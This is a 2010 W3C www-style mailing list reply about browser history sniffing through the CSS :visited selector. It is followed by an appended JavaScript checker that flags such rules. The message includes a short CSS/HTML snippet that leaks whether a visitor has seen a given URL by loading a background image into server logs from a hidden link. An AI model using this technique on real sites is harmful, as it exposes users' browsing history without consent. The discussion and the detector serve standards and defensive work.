Re: NodeSelector, :visited, and :link

From: Alan Gresley <alan@css-class.com>
Date: Thu, 26 Aug 2010 22:32:39 +1000
Message-ID: <4C765EE7.4090803@css-class.com>
To: Garrett Smith <dhtmlkitchen@gmail.com>
CC: Brad Kemper <brad.kemper@gmail.com>, Boris Zbarsky <bzbarsky@mit.edu>, Patrick Garies <pgaries@fastmail.us>, www-style <www-style@w3.org>

Garrett Smith wrote:
> On 8/25/10, Brad Kemper <brad.kemper@gmail.com> wrote:
>> On Aug 25, 2010, at 10:42 PM, Garrett Smith <dhtmlkitchen@gmail.com> wrote:
>>
>>> On 8/25/10, Brad Kemper <brad.kemper@gmail.com> wrote:
>>>>
>>>> On Aug 25, 2010, at 9:25 PM, Garrett Smith <dhtmlkitchen@gmail.com>
>>>> wrote:
>>>>
> [...]
>> If "and?" was instead intended to mean "and given that it is a serious
>> security issue, then why not address my earlier point about making the more
>> secure behavior required instead of optional,", then I'd say one reason is
>> that not all UAs are Web browsers. For instance, for an HTML-based help
>> system, authored entirely by a controlled OS team, and unable to browse the
>> Web, it might be more important to be able to differentiate responses based
>> on what help files you've already seen, than to deal with a threat that
>> doesn't really apply to it in its limited scope.
> 
> Fine example there. This doesn't work in most browsers and so any
> developer tasked with that might try it. If he finds that it works in
> the one browser that he's required to support, he'll use it. A
> non-interoperable website is born.
> 
> The feature is designed to be not interoperable and I think that it
> may lead to compatibility problems.


I don't quite understand what is not interoperable and you may have 
already provided this point earlier in this thread or another thread.


> There aren't any web apis for file protocol, so maybe your help-system
> should focus on that. You might also notice the variations of
> anomalies with XMLHttpRequest on local file protocol.


I will answer this not quite understanding what you are saying. Such 
phishing attacks usually affect the least web-savvy, who would likely 
be the same people who would not quite understand a question like:

   | Please select this box to disable your browsing history
   | to guard against possible phishing attacks.


There is no need to know scripting to exploit this. One only needs 
hosting with log files and a medium knowledge of HTML and CSS.


[href="http://www.google.com.au/"]:visited {
   background: url(any.jpg);
}

#test {
   position: absolute;
   left: -10000px;
}


<a id="test" href="http://www.google.com.au/">




-- 
Alan http://css-class.com/

Armies Cannot Stop An Idea Whose Time Has Come. - Victor Hugo
Received on Thursday, 26 August 2010 12:33:12 GMT
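
As an added example (not part of the message above, and not any browser's code), here is a small JavaScript check a reviewer could run over a stylesheet to flag the pattern the message shows: a `:visited` rule whose declaration loads a `url()` resource, which is what makes a visit appear in a server log. The names `findVisitedFetches` and `SAMPLE_CSS` are assumptions, and apart from the first rule, which is copied from the message, the sample stylesheet is constructed.

```javascript
// Added example: flag :visited rules that fetch a resource via url().
// Limitation (by design, to stay short): declarations are split on ";",
// so a data: URI containing ";" inside url() is not parsed correctly.
function findVisitedFetches(css) {
  const findings = [];
  // Drop comments so rules that are commented out are ignored.
  const clean = css.replace(/\/\*[\s\S]*?\*\//g, "");
  // Match innermost "selector { declarations }" blocks. Because the pattern
  // excludes braces, it also reaches rules nested inside @media.
  const rule = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = rule.exec(clean)) !== null) {
    // In a grouped selector (p, a:visited) only the :visited members matter.
    const hits = m[1].split(",").map(s => s.trim())
      .filter(s => /:visited\b/i.test(s));
    if (hits.length === 0) continue;
    for (const decl of m[2].split(";")) {
      const i = decl.indexOf(":"); // first colon ends the property name
      if (i < 0) continue;
      const property = decl.slice(0, i).trim().toLowerCase();
      const value = decl.slice(i + 1).trim();
      const url = /url\(\s*(['"]?)(.*?)\1\s*\)/i.exec(value);
      if (url) {
        findings.push({ selector: hits.join(", "), property, resource: url[2] });
      }
    }
  }
  return findings;
}

// First rule is the one from the message; the rest is constructed test input.
const SAMPLE_CSS = `
/* a:visited { background: url(ignored.jpg) } */
[href="http://www.google.com.au/"]:visited { background: url(any.jpg); }
#test { position: absolute; left: -10000px; }
a:visited { color: purple; }
@media screen { p, li a:visited { list-style-image: url("m.png") } }
`;

for (const f of findVisitedFetches(SAMPLE_CSS)) {
  console.log(`${f.selector} -> ${f.property} loads ${f.resource}`);
}
```

The plain `a:visited { color: purple; }` rule is not reported, since it causes no request.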
